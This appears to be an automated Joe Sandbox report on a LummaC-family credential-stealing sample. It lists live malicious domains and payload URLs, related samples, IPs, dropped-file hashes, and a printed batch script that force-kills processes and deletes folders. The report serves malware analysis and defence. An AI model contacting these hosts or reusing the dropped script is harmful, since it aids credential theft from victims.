                                        high
                                        http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0#file.exefalse
                                          high
                                          https://librari-night.sbs/RegSvcs.exe, 0000000C.00000002.2319143883.0000000000CA4000.00000004.00000020.00020000.00000000.sdmpfalse
                                            high
                                            http://ocsp.sectigo.com0file.exe, Installer.exe.9.drfalse
                                              high
                                              https://librari-night.sbs:443/apiRegSvcs.exe, 0000000C.00000002.2318932004.0000000000C09000.00000004.00000020.00020000.00000000.sdmpfalse
                                                high
                                                https://librari-night.sbs:443/apitPKRegSvcs.exe, 0000000C.00000002.2318932004.0000000000C09000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: malware
                                                unknown
                                                https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYiRegSvcs.exe, 0000000C.00000002.2319729025.000000000346B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://librari-night.sbs/bRegSvcs.exe, 0000000C.00000002.2319143883.0000000000C8B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: malware
                                                  unknown
                                                  https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&ctaRegSvcs.exe, 0000000C.00000002.2319729025.000000000346B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    http://crl.sectigo.com/SectigoPublicTimeStampingRootR46.crl0file.exefalse
                                                      high
                                                      http://joxi.net/4Ak49WQH0GE3Nr.mp36UInstaller.exe, 0000000B.00000002.2123014561.0000000000F62000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        high
                                                        https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpgRegSvcs.exe, 0000000C.00000002.2319729025.000000000346B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0zfile.exefalse
                                                            high
                                                            https://librari-night.sbs/=RegSvcs.exe, 0000000C.00000002.2319143883.0000000000C8B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: malware
                                                            unknown
                                                            https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&refRegSvcs.exe, 0000000C.00000002.2319729025.000000000346B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              http://usbtor.ru/viewtopic.php?t=798)Zfile.exefalse
                                                              • 0%, Virustotal, Browse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              http://crl.microsoft.cRegSvcs.exe, 0000000C.00000002.2319086151.0000000000C45000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                high
                                                                http://joxi.net/4Ak49WQH0GE3Nr.mp3ouMInstaller.exe, 0000000B.00000002.2123014561.0000000000F62000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  high
                                                                  http://crl.sectigo.com/SectigoRSACodeSigningCA2.crl0tInstaller.exe.9.drfalse
                                                                    high
                                                                    https://librari-night.sbs:443/apihv.default-release/key4.dbPKRegSvcs.exe, 0000000C.00000002.2318932004.0000000000C09000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: malware
                                                                    unknown
                                                                    https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477RegSvcs.exe, 0000000C.00000002.2319729025.000000000346B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://joxi.net/4Ak49WQH0GE3Nr.mp3SInstaller.exe, 0000000B.00000002.2123014561.0000000000F62000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        high
                                                                        http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0#file.exefalse
                                                                          high
                                                                          https://librari-night.sbs/apiAA==RegSvcs.exe, 0000000C.00000002.2319745447.000000000346E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: malware
                                                                          unknown
                                                                          • No. of IPs < 25%
                                                                          • 25% < No. of IPs < 50%
                                                                          • 50% < No. of IPs < 75%
                                                                          • 75% < No. of IPs
                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                          172.67.206.172
                                                                          librari-night.sbsUnited States
                                                                          13335CLOUDFLARENETUSfalse
                                                                          176.9.162.205
                                                                          joxi.netGermany
                                                                          24940HETZNER-ASDEfalse
                                                                          Joe Sandbox version:41.0.0 Charoite
                                                                          Analysis ID:1560657
                                                                          Start date and time:2024-11-22 05:01:06 +01:00
                                                                          Joe Sandbox product:CloudBasic
                                                                          Overall analysis duration:0h 6m 17s
                                                                          Hypervisor based Inspection enabled:false
                                                                          Report type:full
                                                                          Cookbook file name:default.jbs
                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                          Number of analysed new started processes analysed:15
                                                                          Number of new started drivers analysed:0
                                                                          Number of existing processes analysed:0
                                                                          Number of existing drivers analysed:0
                                                                          Number of injected processes analysed:0
                                                                          Technologies:
                                                                          • HCA enabled
                                                                          • EGA enabled
                                                                          • AMSI enabled
                                                                          Analysis Mode:default
                                                                          Analysis stop reason:Timeout
                                                                          Sample name:file.exe
                                                                          Detection:MAL
                                                                          Classification:mal100.troj.spyw.evad.winEXE@23/17@3/2
                                                                          EGA Information:
                                                                          • Successful, ratio: 100%
                                                                          HCA Information:
                                                                          • Successful, ratio: 90%
                                                                          • Number of executed functions: 138
                                                                          • Number of non-executed functions: 279
                                                                          Cookbook Comments:
                                                                          • Found application associated with file extension: .exe
                                                                          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                          • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                          TimeTypeDescription
                                                                          23:02:03API Interceptor1x Sleep call for process: Installer.exe modified
                                                                          23:02:05API Interceptor10x Sleep call for process: RegSvcs.exe modified
                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                          172.67.206.172injector V2.5.exeGet hashmaliciousLummaCBrowse
                                                                            file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                                              file.exeGet hashmaliciousLummaCBrowse
                                                                                file.exeGet hashmaliciousLummaCBrowse
                                                                                  file.exeGet hashmaliciousLummaCBrowse
                                                                                    file.exeGet hashmaliciousLummaCBrowse
                                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                                            Unpacker.exeGet hashmaliciousLummaCBrowse
                                                                                              176.9.162.205file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, Credential Flusher, LummaC Stealer, Panda Stealer, StealcBrowse
                                                                                              • joxi.net/4Ak49WQH0GE3Nr.mp3
                                                                                              OTKqkliMvG.exeGet hashmaliciousRedLineBrowse
                                                                                              • joxi.net/KAx471XHvWVMDA.dll
                                                                                              pdRXMvn4sP.exeGet hashmaliciousDCRatBrowse
                                                                                              • joxi.net/ZrJl0w4ibZNq32.bin
                                                                                              itM6aejkLX.exeGet hashmaliciousFicker Stealer RedLineBrowse
                                                                                              • joxi.net/n2YJDN3Ue8veGA.proj
                                                                                              OhGodAnETHlargementPill.sfx.exeGet hashmaliciousQuasar RedLineBrowse
                                                                                              • joxi.net/J2bwkXySVlvlwA.proj
                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                              librari-night.sbsinjector V2.5.exeGet hashmaliciousLummaCBrowse
                                                                                              • 172.67.206.172
                                                                                              Documento.exeGet hashmaliciousLummaCBrowse
                                                                                              • 104.21.85.146
                                                                                              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                                                              • 172.67.206.172
                                                                                              file.exeGet hashmaliciousLummaCBrowse
                                                                                              • 172.67.206.172
                                                                                              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                              • 104.21.85.146
                                                                                              file.exeGet hashmaliciousLummaCBrowse
                                                                                              • 172.67.206.172
                                                                                              file.exeGet hashmaliciousLummaCBrowse
                                                                                              • 104.21.85.146
                                                                                              file.exeGet hashmaliciousLummaCBrowse
                                                                                              • 172.67.206.172
                                                                                              file.exeGet hashmaliciousLummaCBrowse
                                                                                              • 172.67.206.172
                                                                                              file.exeGet hashmaliciousLummaCBrowse
                                                                                              • 172.67.206.172
                                                                                              joxi.netfile.exeGet hashmaliciousPureCrypter, LummaC, Amadey, Credential Flusher, LummaC Stealer, Panda Stealer, StealcBrowse
                                                                                              • 176.9.162.205
                                                                                              n7ZKbApaa3.dllGet hashmaliciousLummaC, XmrigBrowse
                                                                                              • 78.47.21.153
                                                                                              PqSIlYOaIF.exeGet hashmaliciousLummaC, XmrigBrowse
                                                                                              • 78.47.21.153
                                                                                              inject.exeGet hashmaliciousRedLine, XmrigBrowse
                                                                                              • 188.114.97.3
                                                                                              gHPYUEh253.exeGet hashmaliciousDjvu, Neoreklami, Stealc, Vidar, XmrigBrowse
                                                                                              • 188.114.97.3
                                                                                              file.exeGet hashmaliciousLummaCBrowse
                                                                                              • 188.114.97.3
                                                                                              file.exeGet hashmaliciousLummaCBrowse
                                                                                              • 188.114.97.3
                                                                                              7aHn0kxDWZ.exeGet hashmaliciousXmrigBrowse
                                                                                              • 188.114.96.3
                                                                                              BlazeHack.exeGet hashmaliciousPureLog Stealer, RedLine, XmrigBrowse
                                                                                              • 188.114.97.3
                                                                                              CKHSihDX4S.exeGet hashmaliciousRedLine, XmrigBrowse
                                                                                              • 188.114.97.3
                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                              HETZNER-ASDES0FTWARE.exeGet hashmaliciousStealc, VidarBrowse
                                                                                              • 49.13.32.95
                                                                                              1.e.msiGet hashmaliciousDanaBotBrowse
                                                                                              • 148.251.107.246
                                                                                              1.e.msiGet hashmaliciousDanaBotBrowse
                                                                                              • 148.251.107.246
                                                                                              exe009.exeGet hashmaliciousEmotetBrowse
                                                                                              • 195.201.56.70
                                                                                              owari.ppc.elfGet hashmaliciousUnknownBrowse
                                                                                              • 195.201.30.54
                                                                                              ________.exeGet hashmaliciousQuasarBrowse
                                                                                              • 195.201.57.90
                                                                                              bPRQRIfbbq.exeGet hashmaliciousUnknownBrowse
                                                                                              • 95.216.12.30
                                                                                              bPRQRIfbbq.exeGet hashmaliciousUnknownBrowse
                                                                                              • 168.119.160.252
                                                                                              AD6dpKQm7n.exeGet hashmaliciousUnknownBrowse
                                                                                              • 144.76.175.205
                                                                                              AD6dpKQm7n.exeGet hashmaliciousUnknownBrowse
                                                                                              • 195.201.9.37
                                                                                              CLOUDFLARENETUShttps://365214tesauppeortbasd132.z26.web.core.windows.net/#Get hashmaliciousTechSupportScamBrowse
                                                                                              • 104.22.44.142
                                                                                              http://103.212.224.14:9998/helloGet hashmaliciousUnknownBrowse
                                                                                              • 1.1.1.1
                                                                                              file.exeGet hashmaliciousLummaCBrowse
                                                                                              • 172.67.155.248
                                                                                              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                              • 172.67.155.248
                                                                                              file.exeGet hashmaliciousLummaCBrowse
                                                                                              • 104.21.66.38
                                                                                              file.exeGet hashmaliciousLummaCBrowse
                                                                                              • 104.21.66.38
                                                                                              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                              • 172.67.155.248
                                                                                              88a4dd8-Contract Agreement-Final378208743.pdfGet hashmaliciousUnknownBrowse
                                                                                              • 104.16.123.96
                                                                                              754619b-Contract Agreement-Final727916073.pdfGet hashmaliciousUnknownBrowse
                                                                                              • 104.18.95.41
                                                                                              arm.nn-20241122-0008.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                              • 104.28.200.40
                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                              a0e9f5d64349fb13191bc781f81f42e1file.exeGet hashmaliciousLummaCBrowse
                                                                                              • 172.67.206.172
                                                                                              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                              • 172.67.206.172
                                                                                              file.exeGet hashmaliciousLummaCBrowse
                                                                                              • 172.67.206.172
                                                                                              file.exeGet hashmaliciousLummaCBrowse
                                                                                              • 172.67.206.172
                                                                                              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                              • 172.67.206.172
                                                                                              file.exeGet hashmaliciousLummaCBrowse
                                                                                              • 172.67.206.172
                                                                                              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                              • 172.67.206.172
                                                                                              file.exeGet hashmaliciousLummaCBrowse
                                                                                              • 172.67.206.172
                                                                                              file.exeGet hashmaliciousLummaCBrowse
                                                                                              • 172.67.206.172
                                                                                              file.exeGet hashmaliciousLummaCBrowse
                                                                                              • 172.67.206.172
                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                              C:\Users\user\AppData\Local\Temp\main\7z.exefile.exeGet hashmaliciousPureCrypter, LummaC, Amadey, Credential Flusher, LummaC Stealer, Panda Stealer, StealcBrowse
                                                                                                n7ZKbApaa3.dllGet hashmaliciousLummaC, XmrigBrowse
                                                                                                  PqSIlYOaIF.exeGet hashmaliciousLummaC, XmrigBrowse
                                                                                                    Set-up.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                      UwKpCJ6l4p.exeGet hashmaliciousDCRatBrowse
                                                                                                        inject.exeGet hashmaliciousRedLine, XmrigBrowse
                                                                                                          gHPYUEh253.exeGet hashmaliciousDjvu, Neoreklami, Stealc, Vidar, XmrigBrowse
                                                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                                                              file.exeGet hashmaliciousLummaCBrowse
                                                                                                                7aHn0kxDWZ.exeGet hashmaliciousXmrigBrowse
                                                                                                                  C:\Users\user\AppData\Local\Temp\main\7z.dllfile.exeGet hashmaliciousPureCrypter, LummaC, Amadey, Credential Flusher, LummaC Stealer, Panda Stealer, StealcBrowse
                                                                                                                    n7ZKbApaa3.dllGet hashmaliciousLummaC, XmrigBrowse
                                                                                                                      PqSIlYOaIF.exeGet hashmaliciousLummaC, XmrigBrowse
                                                                                                                        Set-up.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                          UwKpCJ6l4p.exeGet hashmaliciousDCRatBrowse
                                                                                                                            inject.exeGet hashmaliciousRedLine, XmrigBrowse
                                                                                                                              gHPYUEh253.exeGet hashmaliciousDjvu, Neoreklami, Stealc, Vidar, XmrigBrowse
                                                                                                                                file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                  file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                    7aHn0kxDWZ.exeGet hashmaliciousXmrigBrowse
                                                                                                                                      Process:C:\Users\user\Desktop\file.exe
                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1679360
                                                                                                                                      Entropy (8bit):6.278252955513617
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24576:S+clx4tCQJSVAFja8i/RwQQmzgO67V3bYgR+zypEqxr2VSlLP:jclmJSVARa86xzW3xRoyqqxrT
                                                                                                                                      MD5:72491C7B87A7C2DD350B727444F13BB4
                                                                                                                                      SHA1:1E9338D56DB7DED386878EAB7BB44B8934AB1BC7
                                                                                                                                      SHA-256:34AD9BB80FE8BF28171E671228EB5B64A55CAA388C31CB8C0DF77C0136735891
                                                                                                                                      SHA-512:583D0859D29145DFC48287C5A1B459E5DB4E939624BD549FF02C61EAE8A0F31FC96A509F3E146200CDD4C93B154123E5ADFBFE01F7D172DB33968155189B5511
                                                                                                                                      Malicious:false
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                      Joe Sandbox View:
                                                                                                                                      • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                      • Filename: n7ZKbApaa3.dll, Detection: malicious, Browse
                                                                                                                                      • Filename: PqSIlYOaIF.exe, Detection: malicious, Browse
                                                                                                                                      • Filename: Set-up.exe, Detection: malicious, Browse
                                                                                                                                      • Filename: UwKpCJ6l4p.exe, Detection: malicious, Browse
                                                                                                                                      • Filename: inject.exe, Detection: malicious, Browse
                                                                                                                                      • Filename: gHPYUEh253.exe, Detection: malicious, Browse
                                                                                                                                      • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                      • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                      • Filename: 7aHn0kxDWZ.exe, Detection: malicious, Browse
                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........w...$...$...$.&.$...$.&.$...$...$...$.&.$%..$.&.$..$.&G$...$.&.$...$.&.$...$.&.$...$Rich...$........................PE..d.....n\.........." .........H...............................................P............`.............................................y...l...x........{...p.......................................................................................................text............................... ..`.rdata..9...........................@..@.data...............................@....pdata.......p... ..................@..@.rsrc....{.......|..................@..@.reloc...0.......2...n..............@..B........................................................................................................................................................................................................................................................
                                                                                                                                      Process:C:\Users\user\Desktop\file.exe
                                                                                                                                      File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):468992
                                                                                                                                      Entropy (8bit):6.157743912672224
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6144:fz1gL5pRTMTTjMkId/BynSx7dEe6XwzRaktNP08NhKs39zo43fTtl1fayCV7+DHV:r1gL5pRTcAkS/3hzN8qE43fm78V
                                                                                                                                      MD5:619F7135621B50FD1900FF24AADE1524
                                                                                                                                      SHA1:6C7EA8BBD435163AE3945CBEF30EF6B9872A4591
                                                                                                                                      SHA-256:344F076BB1211CB02ECA9E5ED2C0CE59BCF74CCBC749EC611538FA14ECB9AAD2
                                                                                                                                      SHA-512:2C7293C084D09BC2E3AE2D066DD7B331C810D9E2EECA8B236A8E87FDEB18E877B948747D3491FCAFF245816507685250BD35F984C67A43B29B0AE31ECB2BD628
                                                                                                                                      Malicious:false
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                      Joe Sandbox View:
                                                                                                                                      • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                      • Filename: n7ZKbApaa3.dll, Detection: malicious, Browse
                                                                                                                                      • Filename: PqSIlYOaIF.exe, Detection: malicious, Browse
                                                                                                                                      • Filename: Set-up.exe, Detection: malicious, Browse
                                                                                                                                      • Filename: UwKpCJ6l4p.exe, Detection: malicious, Browse
                                                                                                                                      • Filename: inject.exe, Detection: malicious, Browse
                                                                                                                                      • Filename: gHPYUEh253.exe, Detection: malicious, Browse
                                                                                                                                      • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                      • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                      • Filename: 7aHn0kxDWZ.exe, Detection: malicious, Browse
                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........(...{...{...{...{...{...{...{...{...{...{...{...{...{..!{...{...{...{...{...{Rich...{................PE..d.....n\.........."..........l...... .........@...........................................`.....................................................x....`..........,a...........p.......................................................... ............................text............................... ..`.rdata..............................@..@.data....,..........................@....pdata..,a.......b..................@..@.rsrc........`......................@..@.reloc.......p......................@..B........................................................................................................................................................................................................................................................................
                                                                                                                                      Process:C:\Users\user\Desktop\file.exe
                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):222
                                                                                                                                      Entropy (8bit):4.855194602218789
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6:vFuj9HUHOPLtInnIgvRY77flFjfA+qpxuArS3+xTfVk3:duj9HeONgvRYnlfYFrSMTtk3
                                                                                                                                      MD5:68CECDF24AA2FD011ECE466F00EF8450
                                                                                                                                      SHA1:2F859046187E0D5286D0566FAC590B1836F6E1B7
                                                                                                                                      SHA-256:64929489DC8A0D66EA95113D4E676368EDB576EA85D23564D53346B21C202770
                                                                                                                                      SHA-512:471305140CF67ABAEC6927058853EF43C97BDCA763398263FB7932550D72D69B2A9668B286DF80B6B28E9DD1CBA1C44AAA436931F42CC57766EFF280FDB5477C
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:Cd /d %1..Rd "%SfxVarApiPath%"..For /f "Tokens=1,2 Delims=," %%I In ('TaskList /fo CSV /nh') Do (.. If %%I==%2 (.. Set /a N+=1.. Set PID=%%~J.. )..)..If %N% EQU 1 Rd /s /q %1..If %N% GTR 1 TaskKill /pid %PID% /t /f
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                      File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):2354366
                                                                                                                                      Entropy (8bit):5.892072121713162
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24576:5yZBPkpRrP9pxC+XvoflcYy36s3vb0EecYy37n92k8GtGAQZ67hR7krC/Cyf0/xM:R9kqGu7okoZscCnf0/Zs9N
                                                                                                                                      MD5:5054A8DF169D8E6D7B594E0745D359C5
                                                                                                                                      SHA1:1494D40F91553D1F288A86C7BA8A622FB7830240
                                                                                                                                      SHA-256:9FC8E80432DD949130510671D7810110F5C84FD1876A8C624B500D1B1A999446
                                                                                                                                      SHA-512:702069B56A78CD925C5AE032C978C375F19E81E4191C3DA5DA04791A9617C8778A1A1F737AFBA90EB32976E9993E20626C1D407BB863733E2A871D9F772A9BA1
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:KmO6sb9bzFlO6QmlyBR3cUuBrPdmJRJBhXshklfui2fRJCiITlYNEM2EqC9x9I0qVq7CGnIhkwh6hvGvu5pkfBRaoLATG90WNTmCTDFIBTSnd7l9KiCxIUJ5zlBvrKkHZaxyJb0N052Q1AaMDCASX2cw1ZaV1bKcufYPprTSqVIRscgIruKC2MOUPLxNBR1egyVxwSbedVhVl89lRxHAMRMf16G6Ry1TTz7dOtnEaLQowPwuw8eDnR20ZOyf9yYTVcpDsiS4K2VzryfyiwiOXZDq7UaTFrtOgtVQzuNXN74O8xkfvt4Ykzxcs60WfAkGZKsYbwZWS4bPPY8cze1vDL6leHmcDUIbsBvTleZtzGhgeYGdRaUmv5ljenoBZOBDIndh9KTa7zBVHuP4jAK8C2IKaB5BgFReYTleqD0cCkhTdxbkQAMwHPuKktcCRORGmFfE37OzhnpNUtRyIHoGBwau6RcKp6vTNwIWRMkDjZaejD2NS5TCgRvcwgZcldKIAtOqIN0TXMXlnX6scNgHltMTvvwSZbBsDdCGRINZlutVfbP6joQl5sw21ICykYYYKwRfLlfpREpOzuAjwo7oC8hJ4Tv652auJh1RujdaLcIfX5oB1GDuu95ojl52qB08Lzg7nIl7yDb4k9X8rUPZ857XTGTaXkhL77wwG75hAnvfazjbPfP5GZrDYRdhe2I0zSJZuV5aaWd5Imf8Ck0w9ALkKR7xhRlclC4FnJOBuXxpdcsG9gE8tgukaoXpzf4z0CHJ0VOfBNcErBEPyoWMZfee3Vfg2NyLVPvaC6c5HNC1mZSr0SpB1RAlj2w7ST9eZL5DUYwl8p6flt6I3p7MBJrZLlY3LgBSr5F4BYYU6sebHdx0ES2Ci6J9wBw0wGLCy8SeSDS45pkrvWvTZkvW2oFTNBda3aYJyut0zJi1Chjp4xQkH1cEMWZUOy7MueiWNcfeKZqM4Gg2hr7XoLoTQXyvcXvxeOwXoXJKXvu4
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):918840
                                                                                                                                      Entropy (8bit):7.692518102409107
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24576:ojMYNiVLapQ8MbIeXuugoKocKUIeXuugoKocKJ:k1OZbIMFYIMFF
                                                                                                                                      MD5:18EB75EF50B1A51600E686B6B9DE277E
                                                                                                                                      SHA1:5E83C15E87350658526327253FBD22C546BF9C01
                                                                                                                                      SHA-256:F5BCE7485128FF917D769FCCB01CE12639FF2278E132CF869E5E90E1A82AF46D
                                                                                                                                      SHA-512:EB5AFB258A8D6E919B6C1FE73E050A4F43E60C31C34AC2F89C6B94E10660AF26ABD6E63863E72FE27CB05B66FAAA0A424527CC8E45E2B4AC07D4E38C0563CF36
                                                                                                                                      Malicious:true
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 71%
                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......//.kN..kN..kN...%..aN...%...N...%..yN..9;..zN..9;..zN..9;..CN...%..bN..kN..0N..=;..jN..=;y.jN..kN..jN..=;..jN..RichkN..........................PE..L....v:a.................&....-..............@....@..........................@/...........@.....................................d.....).............F..8.... /........8...............................@............@..H............................text...)%.......&.................. ..`.rdata...x...@...z...*..............@..@.data.....'.........................@....rsrc........).....................@..@.reloc....... /......4..............@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):753195
                                                                                                                                      Entropy (8bit):7.997684361846243
                                                                                                                                      Encrypted:true
                                                                                                                                      SSDEEP:12288:59pEORLcBL72DpwhpHzawQ/3tTfcjU0ZWri9KL0oVa:dRLcl73h5aJtfKU0Yri9Ak
                                                                                                                                      MD5:205E19DF5C0DA1B5176B63DEAC4D13FC
                                                                                                                                      SHA1:7DBF4DDF79DFE58128D3F63A8C4D85D113ED281B
                                                                                                                                      SHA-256:2B1DA540C478E02BDF98492EC614C42C5D1C78C784A063CD4A4EC15963064EB0
                                                                                                                                      SHA-512:0FC10261712F2A3EC5B113AE648069C2F4A09F6CE1E051FDD568E2BA1EA719F1487ED058A4202EFD39B7AE9D027CF8C981ED949894EABDAB848A5A9CF22DCE23
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:PK..........uY.)^..}..8.......Installer.exe.\}`.....K.pa...1.)A...4........)..&..i<.R......9.f8.....R.....?J/.&.*........5J...l.o..H.....|.y.f.....Zr...!I...iJ.^...H...c..I...$=9....V.|.........Ol.....o..U.m....w..]~c...w.[.UzzZv...W..6.....in.W..X.."..W. .....{E.M.......~u.h..k......UD.......S.U.....:.._.)....6..V....^.n.h.4K...~u.(.=.&.&.F...KR....Qu....?...@..-...s.{..u..q......*.S......j....v....6....!.,..k.....*.....Ab..x..$.r.u.....!9.{._1.q........e..G....>...j..M.#...1K.....|...y7.1v1.....S..n.......+A.&...{..Y.3(..`P.:[B.dg.2.<..A......7".v6 ,....V....f..U.....l9.u...J.......g.....t.i....S..m.H...1...E.J..+b.Rl,z....G)L?..... ..*.,..T..O.....@...5.......$....j,+.`.+b.oc;...X..,"U...&.6.f...J......].2.+...)...R...B.=....L.u........l....S.=..:....6..@t;.r...w..d..(bA..fAJ....q...u.....0:.......'...1...=A)...s6S.y.q<.[..N!.c.J.....f$.......@3..%Ic."f..X.u..<n9.v..=....a.`.n.e......u......d.....i^....XT.7._=9d.as....O3PdW.C.....}
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                      File Type:Zip archive data, at least v1.0 to extract, compression method=store
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):753349
                                                                                                                                      Entropy (8bit):7.997701096374857
                                                                                                                                      Encrypted:true
                                                                                                                                      SSDEEP:12288:J9pEORLcBL72DpwhpHzawQ/3tTfcjU0ZWri9KL0oVe:tRLcl73h5aJtfKU0Yri9A4
                                                                                                                                      MD5:1171BF3E9EB3D2938F47925B7ADE0D6C
                                                                                                                                      SHA1:B07E871D019C4A9845F04EAB8F094F9BB1310584
                                                                                                                                      SHA-256:9191D250D7C10F4B87162CE79DF4DA34747BE7E050381BF5D679ACD8353C4D82
                                                                                                                                      SHA-512:478DA18F0E4D47CD18769B2A19DEDEE10CFEA1AA34251E68A8D9A8396770E9C90F386B17EBB12DEFAB2C4DA065650DE7FF538F6F4E29E5ADE9AF82D1C4C1BCD7
                                                                                                                                      Malicious:false
